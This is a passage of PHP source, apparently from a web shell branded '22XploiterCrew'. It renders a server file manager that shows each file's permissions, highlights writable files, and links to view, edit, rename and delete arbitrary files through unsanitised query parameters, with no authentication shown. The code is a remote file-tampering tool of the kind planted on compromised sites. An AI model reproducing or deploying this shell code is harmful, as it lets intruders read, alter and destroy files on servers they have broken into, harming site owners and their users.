1548. $size = $size.' KB';
1549. }
1550.  
1551.  
1552. echo '<tr>
1553. <td><img src="';
1554. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
1555. if($ext == "php") {
1556. echo 'https://image.flaticon.com/icons/png/128/337/337947.png"';
1557. }elseif ($ext == "html") {
1558. echo 'https://image.flaticon.com/icons/png/128/136/136528.png"';
1559. }elseif ($ext == "css") {
1560. echo 'https://image.flaticon.com/icons/png/128/136/136527.png"';
1561. }elseif ($ext == "png") {
1562. echo 'https://image.flaticon.com/icons/png/128/136/136523.png"';
1563. }elseif ($ext == "jpg") {
1564. echo 'https://image.flaticon.com/icons/png/128/136/136524.png"';
1565. }elseif ($ext == "jpeg") {
1566. echo 'http://i.imgur.com/e8mkvPf.png"';
1567. }elseif($ext == "zip") {
1568. echo 'https://image.flaticon.com/icons/png/128/136/136544.png"';
1569. }elseif ($ext == "js") {
1570. echo 'https://image.flaticon.com/icons/png/128/1126/1126856.png';
1571. }elseif ($ext == "ttf") {
1572. echo 'https://image.flaticon.com/icons/png/128/1126/1126892.png';
1573. }elseif ($ext == "otf") {
1574. echo 'https://image.flaticon.com/icons/png/128/1126/1126891.png';
1575. }elseif ($ext == "txt") {
1576. echo 'https://image.flaticon.com/icons/png/128/136/136538.png';
1577. }elseif ($ext == "ico") {
1578. echo 'https://image.flaticon.com/icons/png/128/1126/1126873.png';
1579. }elseif ($ext == "conf") {
1580. echo 'https://image.flaticon.com/icons/png/512/1573/1573301.png';
1581. }elseif ($ext == "htaccess") {
1582. echo 'https://image.flaticon.com/icons/png/128/1720/1720444.png';
1583. }elseif ($ext == "sh") {
1584. echo 'https://image.flaticon.com/icons/png/128/617/617535.png';
1585. }elseif ($ext == "py") {
1586. echo 'https://image.flaticon.com/icons/png/128/180/180867.png';
1587. }elseif ($ext == "sql") {
1588. echo 'https://img.icons8.com/ultraviolet/2x/data-configuration.png';
1589. }elseif ($ext == "pl") {
1590. echo 'http://i.imgur.com/PnmX8H9.png';
1591. }elseif ($ext == "pdf") {
1592. echo 'https://image.flaticon.com/icons/png/128/136/136522.png';
1593. }elseif ($ext == "mp4") {
1594. echo 'https://image.flaticon.com/icons/png/128/136/136545.png';
1595. }elseif ($ext == "mp3") {
1596. echo 'https://image.flaticon.com/icons/png/128/136/136548.png';
1597. }elseif ($ext == "git") {
1598. echo 'https://image.flaticon.com/icons/png/128/617/617509.png';
1599. }elseif ($ext == "md") {
1600. echo 'https://image.flaticon.com/icons/png/128/617/617520.png';
1601. }else{
1602. echo 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png';
1603. }
1604. echo '" class="ico2"></img>';
1605.  
1606. if (strlen($file) > 25) {
1607. $_file = substr($file, 0, 25)."...-.".$ext;
1608. }else{
1609. $_file = $file;
1610. }
1611.  
1612. echo' <a href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">'.$_file.'</a></td>';
1613. echo '<td class="text-center">';
1614. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
1615.  
1616. if($ext == "php") {
1617. echo 'application/octet-stream';
1618. }elseif ($ext == "html") {
1619. echo 'text/html';
1620. }elseif ($ext == "css") {
1621. echo 'application/octet-stream';
1622. }elseif ($ext == "png") {
1623. echo 'image/png';
1624. }elseif ($ext == "jpg") {
1625. echo 'image/jpg';
1626. }elseif ($ext == "jpeg") {
1627. echo 'image/jpeg';
1628. }elseif($ext == "zip") {
1629. echo 'dokumen/zip';
1630. }elseif ($ext == "js") {
1631. echo 'text/js';
1632. }elseif ($ext == "ttf") {
1633. echo 'application/octet-stream';
1634. }elseif ($ext == "otf") {
1635. echo 'application/octet-stream';
1636. }elseif ($ext == "txt") {
1637. echo 'text/txt';
1638. }elseif ($ext == "ico") {
1639. echo 'application/octet-stream';
1640. }elseif ($ext == "conf") {
1641. echo 'application/octet-stream';
1642. }elseif ($ext == "htaccess") {
1643. echo 'application/octet-stream';
1644. }elseif ($ext == "sh") {
1645. echo 'application/octet-stream';
1646. }elseif ($ext == "py") {
1647. echo 'application/octet-stream';
1648. }elseif ($ext == "sql") {
1649. echo 'application/octet-stream';
1650. }elseif ($ext == "pl") {
1651. echo 'application/octet-stream';
1652. }elseif ($ext == "pdf") {
1653. echo 'dokumen/pdf';
1654. }elseif ($ext == "mp4") {
1655. echo 'media/mp4';
1656. }elseif ($ext == "mp3") {
1657. echo 'media/mp3';
1658. }elseif ($ext == "git") {
1659. echo 'application/octet-stream';
1660. }elseif ($ext == "md") {
1661. echo 'application/octet-stream';
1662. }else{
1663. echo 'dokumen/docs';
1664. }
1665. echo '</td>
1666. <td><center>'.$size.'</center></td>
1667. <td><center>';
1668. if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
1669. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
1670. echo perms($path.'/'.$file);
1671. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>
1672. <td class="text-center">
1673. <a title="Lihat" class="badge" href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">Lihat</a>
1674. <a title="Edit" class="badge" href="?dir='.$path.'&aksi=edit&dirf='.$path.'/'.$file.'">Edit</a>
1675. <a title="Edit" class="badge" href="?dir='.$path.'&aksi=rename&dirf='.$path.'/'.$file.'">Ubah Nama</a>
1676. <a class="badge" href="?dir='.$path.'&aksi=hapusf&dirf='.$path.'/'.$file.'" title="Delete">Hapus</a>
1677. </td>
1678. </tr>';
1679. }
1680. echo '</table></div><hr/>';
1681. echo "<a href='' class='scrollToTop'><i class='fas fa-arrow-up up'></i></a>";
1682. echo '<center><small>Copyright all right reserved '.date('M-Y').' <a href="https://22xploitercrew.com">22XploiterCrew</a></small></center>';
1683. ?>